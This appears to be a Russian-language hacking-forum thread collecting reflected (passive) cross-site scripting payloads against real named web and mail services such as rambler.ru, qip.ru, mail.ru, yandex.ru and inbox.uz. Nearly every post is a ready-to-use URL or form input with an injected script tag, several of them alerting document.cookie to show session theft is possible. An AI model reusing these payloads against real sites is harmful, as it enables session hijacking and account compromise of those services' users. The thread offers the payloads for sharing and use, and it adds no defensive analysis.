|
Пассивные xss на почтовых серверах
Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)
Оффтоп наказуем p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету |
rambler.ru
http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E |
http://top100.rambler.ru/cgi-bin/reg...p=0®=accept
Во всех полях вставляем "><script>alert('xss')</script> http://goon.ru/i/phone/rus_moscow.htm В поле Поиск по фамилии "><script>alert('xss')</script> http://catalog.aport.ru/rus/add/AddUrl.aspx В Адрес ресурса вставляем "><script>alert('xss')</script> |
Ramber.ru
http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>aler t(/TreV@N/)</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert( 'TreV@N')</script>&form=0&hu=1&what=0 http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&wha t=0"><script>alert('TreV@N')</script> http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script >alert('TreV@N')</script>&hu=1&what=0 |
Решил выложить XSS найденную лично мной
Код:
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E |
пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E |
Цитата:
Код:
http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E |
http://inbox.uz/
'><script>alert(/xss/)</script> Уязвимые поля Логин и пароль. |
http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script> http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script> http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script> http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script> http://www.pisem.net/download.php/?file="><script>alert('XSS')</script> http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> |
http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script> http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script> http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer') </script> http://top100.rambler.ru/cgi-bin/register.cgi?group=49®=accept в поле URL Вашей страницы: Код: "><script>alert(document.cookie)</script |
| Время: 21:00 |